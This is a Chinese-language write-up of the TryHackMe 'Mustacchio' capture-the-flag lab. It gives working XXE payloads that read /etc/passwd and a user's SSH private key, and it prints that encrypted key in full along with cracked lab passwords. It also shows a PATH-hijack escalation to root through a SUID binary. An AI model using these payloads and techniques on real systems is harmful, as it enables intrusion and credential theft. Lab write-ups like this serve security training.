【Tryhackme】Mustacchio（xxe攻击，修改$PATH+SUID提权）

免责声明

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用，请不要将文中使用的工具和渗透思路用于任何非法用途，对此产生的一切后果，本人不承担任何责任，也不对造成的任何误用或损害负责。

服务发现

┌──(root?kali)-[~/tryhackme/Mustacchio] └─# nmap -sV -Pn 10.10.7.89     Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-08 01:33 EST Nmap scan report for 10.10.7.89 Host is up (0.34s latency). Not shown: 998 filtered ports PORT   STATE SERVICE VERSION 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 45.25 seconds

看上去只开启了两个服务

爆破目录

┌──(root?kali)-[~/dirsearch] └─# python3 dirsearch.py -e* -t 100 -u http://10.10.7.89                                                                          _|. _ _  _  _  _ _|_    v0.4.2  (_||| _) (/_(_|| (_| )  Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492  Output File: /root/dirsearch/reports/10.10.7.89/_21-11-08_01-36-40.txt  Error Log: /root/dirsearch/logs/errors-21-11-08_01-36-40.log  Target: http://10.10.7.89/  [01:36:41] Starting:                                          [01:37:08] 200 -    3KB - /about.html                                        [01:37:42] 400 -  305B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd      [01:37:45] 200 -    1KB - /contact.html                                      [01:37:47] 200 -    1KB - /custom/                                           [01:37:56] 301 -  314B  - /fonts  ->  http://10.10.7.89/fonts/            [01:37:57] 200 -    2KB - /gallery.html                                      [01:38:01] 200 -    2KB - /index.html                                        [01:38:02] 301 -  315B  - /images  ->  http://10.10.7.89/images/          [01:38:02] 200 -    6KB - /images/                                           [01:38:30] 200 -   28B  - /robots.txt                                        [01:38:31] 403 -  278B  - /server-status                                     [01:38:32] 403 -  278B  - /server-status/  

/custom/存在目录遍历漏洞，在这里找到一个users.bak文件，下载下来用strings命令查看

┌──(root?kali)-[~/Downloads] └─# strings users.bak                SQLite format 3 tableusersusers CREATE TABLE users(username text NOT NULL, password text NOT NULL) ]admin1868e36a6d2b17d4c2745f1659433a54d4bc5f4b 

我们看到是一个SQLite的用户列表，有用户名和密码：admin：1868e36a6d2b17d4c2745f1659433a54d4bc5f4b

哈希拿到这个牛逼的md5解密网站,解出来是：

bulldog19

所以是什么服务的登陆凭证？试了ssh不行，也找不到登陆页面，重新用一个web字典爆破目录，没有新的目录爆出来

全端口扫描

我做lab时有个习惯，一般是用nmap快速扫描常用端口，扫描完后一边开始渗透常用端口，一边再全端口扫描一次，在我回过头来查看全端口扫描时发现这个靶机还有一个http服务在8765端口

┌──(root?kali)-[~/tryhackme/Mustacchio] └─# nmap -sV -Pn 10.10.7.89 -p- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-08 01:35 EST Nmap scan report for 10.10.7.89 Host is up (0.31s latency). Not shown: 65532 filtered ports PORT     STATE SERVICE VERSION 22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) 80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu)) 8765/tcp open  http    nginx 1.10.3 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1139.53 seconds 

浏览器打开是一个登陆页面，就是用上面的登陆凭证。

xxe攻击

登陆进来有一个留言页面，尝试输入一些信息，没有任何返回，用burpsuite截断http请求，放到repeater，发现回显源码里透露了两个信息

一是输入内容必须是xml格式，二是网页源码里有一行注释：

Barry, you can now SSH in using your key!

现在我们至少知道有一个ssh用户名：barry

我在谷歌上搜索xxe php找到了这篇关于xxe的文章

我们构造payload尝试读取/etc/passwd里的数据

<!DOCTYPE foo [     <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <root>     <name>&xxe;</name> </root>

成功在网页上收到回显

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false joe:x:1002:1002::/home/joe:/bin/bash barry:x:1003:1003::/home/barry:/bin/bash

我们之前尝试爆破barry的ssh密码，但是被告知不允许密码登陆
利用xxe漏洞，我们尝试读取barry的ssh秘钥信息。用户秘钥一般放在/home/$USER/.ssh/id_rsa

我们构造下面payload

<!DOCTYPE foo [     <!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" > ]> <root>     <name>&xxe;</name> </root> 

成功收到秘钥回显

-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E  jqDJP+blUr+xMlASYB9t4gFyMl9VugHQJAylGZE6J/b1nG57eGYOM8wdZvVMGrfN bNJVZXj6VluZMr9uEX8Y4vC2bt2KCBiFg224B61z4XJoiWQ35G/bXs1ZGxXoNIMU MZdJ7DH1k226qQMtm4q96MZKEQ5ZFa032SohtfDPsoim/7dNapEOujRmw+ruBE65 l2f9wZCfDaEZvxCSyQFDJjBXm07mqfSJ3d59dwhrG9duruu1/alUUvI/jM8bOS2D Wfyf3nkYXWyD4SPCSTKcy4U9YW26LG7KMFLcWcG0D3l6l1DwyeUBZmc8UAuQFH7E NsNswVykkr3gswl2BMTqGz1bw/1gOdCj3Byc1LJ6mRWXfD3HSmWcc/8bHfdvVSgQ ul7A8ROlzvri7/WHlcIA1SfcrFaUj8vfXi53fip9gBbLf6syOo0zDJ4Vvw3ycOie TH6b6mGFexRiSaE/u3r54vZzL0KHgXtapzb4gDl/yQJo3wqD1FfY7AC12eUc9NdC rcvG8XcDg+oBQokDnGVSnGmmvmPxIsVTT3027ykzwei3WVlagMBCOO/ekoYeNWlX bhl1qTtQ6uC1kHjyTHUKNZVB78eDSankoERLyfcda49k/exHZYTmmKKcdjNQ+KNk 4cpvlG9Qp5Fh7uFCDWohE/qELpRKZ4/k6HiA4FS13D59JlvLCKQ6IwOfIRnstYB8 7+YoMkPWHvKjmS/vMX+elcZcvh47KNdNl4kQx65BSTmrUSK8GgGnqIJu2/G1fBk+ T+gWceS51WrxIJuimmjwuFD3S2XZaVXJSdK7ivD3E8KfWjgMx0zXFu4McnCfAWki ahYmead6WiWHtM98G/hQ6K6yPDO7GDh7BZuMgpND/LbS+vpBPRzXotClXH6Q99I7 LIuQCN5hCb8ZHFD06A+F2aZNpg0G7FsyTwTnACtZLZ61GdxhNi+3tjOVDGQkPVUs pkh9gqv5+mdZ6LVEqQ31eW2zdtCUfUu4WSzr+AndHPa2lqt90P+wH2iSd4bMSsxg laXPXdcVJxmwTs+Kl56fRomKD9YdPtD4Uvyr53Ch7CiiJNsFJg4lY2s7WiAlxx9o vpJLGMtpzhg8AXJFVAtwaRAFPxn54y1FITXX6tivk62yDRjPsXfzwbMNsvGFgvQK DZkaeK+bBjXrmuqD4EB9K540RuO6d7kiwKNnTVgTspWlVCebMfLIi76SKtxLVpnF 6aak2iJkMIQ9I0bukDOLXMOAoEamlKJT5g+wZCC5aUI6cZG0Mv0XKbSX2DTmhyUF ckQU/dcZcx9UXoIFhx7DesqroBTR6fEBlqsn7OPlSFj0lAHHCgIsxPawmlvSm3bs 7bdofhlZBjXYdIlZgBAqdq5jBJU8GtFcGyph9cb3f+C3nkmeDZJGRJwxUYeUS9Of 1dVkfWUhH2x9apWRV8pJM/ByDd0kNWa/c//MrGM0+DKkHoAZKfDl3sC0gdRB7kUQ +Z87nFImxw95dxVvoZXZvoMSb7Ovf27AUhUeeU8ctWselKRmPw56+xhObBoAbRIn 7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD -----END RSA PRIVATE KEY-----

我们把上面的秘钥在kali上保存成一个id_rsa文件，赋权600
此秘钥还不能正常登陆，需要用john破解秘钥密码：

┌──(root?kali)-[~/tryhackme/Mustacchio] └─# /usr/share/john/ssh2john.py id_rsa >rsacrack                                                                                                                                                                                                                                              ┌──(root?kali)-[~/tryhackme/Mustacchio] └─# john --wordlist=/usr/share/wordlists/rockyou.txt rsacrack  Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status urieljames       (id_rsa) 1g 0:00:00:23 37.67% (ETA: 02:48:42) 0.04221g/s 233721p/s 233721c/s 233721C/s mikkedhaile..mikkal1933 Session aborted

得到密码：urieljames

拿到初始shell

成功登录到barry的ssh，拿到user.txt

┌──(root?kali)-[~/tryhackme/Mustacchio] └─# ssh -i id_rsa barry@10.10.7.89                                                                                                                                                                                                   1 ⨯ Enter passphrase for key 'id_rsa':  Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)   * Documentation:  https://help.ubuntu.com  * Management:     https://landscape.canonical.com  * Support:        https://ubuntu.com/advantage  34 packages can be updated. 16 of these updates are security updates. To see these additional updates run: apt list --upgradable    The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.  Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.  barry@mustacchio:~$ ls user.txt

提权到root

查找靶机上的所有SUID文件

barry@mustacchio:~$ find / -perm -4000 -print /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/passwd /usr/bin/pkexec /usr/bin/chfn /usr/bin/newgrp /usr/bin/at /usr/bin/chsh /usr/bin/newgidmap /usr/bin/sudo /usr/bin/newuidmap /usr/bin/gpasswd /home/joe/live_log /bin/ping /bin/ping6 /bin/umount /bin/mount /bin/fusermount /bin/su

我们发现一个特别的文件/home/joe/live_log，用strings命令查看一下这个文件的内容

barry@mustacchio:/home/joe$ strings live_log /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid printf system __cxa_finalize setgid __libc_start_main GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u+UH []AA]A^A_ Live Nginx Log Reader tail -f /var/log/nginx/access.log

留意这行shell代码tail -f /var/log/nginx/access.log，表明这个SUID文件会调用tail命令监听web日志。

我们可以利用上面的shell命令提权到root

把/home/barry写入$PATH

barry@mustacchio:/home/joe$ export PATH=/home/barry:$PATH

查看现在当前用户的$PATH

barry@mustacchio:/home/joe$ echo $PATH /home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

创建一个tail文件，并且给予执行权限

barry@mustacchio:/home/joe$ touch /home/barry/tail barry@mustacchio:/home/joe$ chmod +x /home/barry/tail

把下面的shell写进/home/barry/tail

#!/bin/bash bash -p

执行live_log，成功提权到root

barry@mustacchio:/home/joe$ vi /home/barry/tail barry@mustacchio:/home/joe$ cat /home/barry/tail #!/bin/bash bash -p barry@mustacchio:/home/joe$ ./live_log  root@mustacchio:/home/joe# id uid=0(root) gid=0(root) groups=0(root),1003(barry) root@mustacchio:/home/joe# whoami root root@mustacchio:/home/joe# cat /root/root.txt 

[温馨提示：高防服务器能助您降低 IT 成本，提升运维效率，使您更专注于核心业务创新。]

[图文来源于网络，不代表本站立场，如有侵权，请联系高防服务器网删除]